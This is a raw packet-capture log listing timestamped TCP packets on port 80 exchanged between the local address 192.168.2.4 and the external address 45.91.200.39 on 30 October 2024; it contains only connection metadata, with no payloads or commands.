Oct 30, 2024 19:47:04.793606043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793647051 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793658972 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793694019 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793701887 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793737888 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793752909 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793775082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793781042 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793833971 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793911934 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793947935 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793971062 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793987036 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793997049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794023037 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794029951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794075012 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794306993 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794343948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794362068 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794379950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794385910 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794430017 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794476986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794528961 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794627905 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794662952 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794681072 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794698954 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794735909 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794737101 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794750929 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794776917 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794792891 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794827938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794863939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794898987 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794931889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.794931889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794931889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794944048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.794982910 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.795404911 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.795439959 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.795459986 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.795475006 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.795485020 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.795523882 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.795572042 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.795624971 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.795824051 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.795878887 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.882616997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.882630110 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.882642031 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.882704973 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.882705927 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910238028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910283089 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910293102 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910341024 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910375118 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910469055 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910530090 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910583973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910593033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910603046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910613060 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910623074 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910639048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910662889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910662889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910662889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910700083 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910763979 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.910813093 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.910998106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911050081 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911084890 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911096096 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911145926 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911209106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911261082 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911268950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911289930 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911335945 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911705971 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911716938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911727905 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911737919 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911761045 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911787033 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911822081 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911832094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911842108 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911854029 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911864996 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.911881924 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911881924 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911907911 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.911990881 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.912043095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.912281990 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.912309885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.912319899 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.912332058 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.912377119 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.912377119 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.952398062 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.952493906 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.952534914 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.952603102 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.999526024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.999560118 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.999572039 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.999597073 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.999636889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027335882 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027411938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027416945 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027421951 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027448893 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027478933 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027549982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027595997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027601004 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027662039 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027678967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027689934 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027700901 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027733088 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027757883 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027834892 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027847052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027857065 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027868032 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.027884007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027914047 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.027914047 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028079033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028089046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028098106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028126955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028150082 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028194904 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028234005 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028244972 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028256893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028291941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028291941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028486013 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028497934 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.028541088 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.028999090 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.029051065 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.029172897 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.029186964 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.029222012 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.030183077 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.030230045 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.030364990 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.030417919 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.030555964 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.030567884 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.030597925 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.030622959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.030690908 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.030745029 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.031909943 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.031920910 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.031932116 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.031965017 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.032015085 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.118012905 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118027925 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118037939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118087053 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.118118048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.118144989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118155956 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118166924 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.118189096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.118189096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.118206978 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.144599915 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.144682884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.144814014 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.144824028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.144834995 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.144844055 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145011902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145021915 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145029068 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145032883 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145044088 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145055056 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145068884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145091057 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145427942 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145438910 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145452976 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145473003 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145500898 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145582914 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145593882 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145605087 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145617962 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145622969 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145647049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145668030 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.145713091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145721912 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.145754099 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146110058 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146152973 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146260977 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146313906 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146410942 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146452904 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146523952 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146533966 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146543026 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146554947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146564960 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146575928 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146575928 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146585941 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.146601915 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146617889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.146639109 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.147138119 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.147193909 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.147330046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.147340059 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.147371054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.234431982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234446049 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234456062 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234524965 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.234693050 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234724045 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234734058 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.234913111 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.261574030 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261584044 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261593103 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261745930 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.261780977 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261821985 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.261881113 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261892080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261913061 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.261938095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.261961937 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261974096 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.261998892 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262134075 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262141943 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262152910 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262176037 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262190104 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262223005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262233019 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262242079 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262260914 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262283087 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262618065 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262631893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262643099 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262653112 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262660027 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262664080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.262685061 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.262711048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263355970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263381958 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263391018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263396978 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263421059 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263473988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263483047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263494015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263504982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263509989 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263516903 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263535976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263554096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263648987 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263659000 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263694048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263722897 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263735056 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263756990 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263778925 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.263808012 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263817072 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.263843060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.351623058 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351646900 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351655960 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351737976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.351772070 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.351820946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351860046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351870060 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.351870060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.351897001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.351907969 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.378536940 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.378695011 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.378706932 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.378716946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.378747940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.378783941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379364967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379378080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379390955 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379410028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379441023 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379456043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379467964 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379478931 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379491091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379498959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379514933 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379519939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379529953 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379549026 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379570007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379605055 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379616976 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379646063 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379672050 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379723072 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379734993 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379766941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379792929 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379837990 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379848957 CET	80	49730	45.91.200.39	192.168.2.4
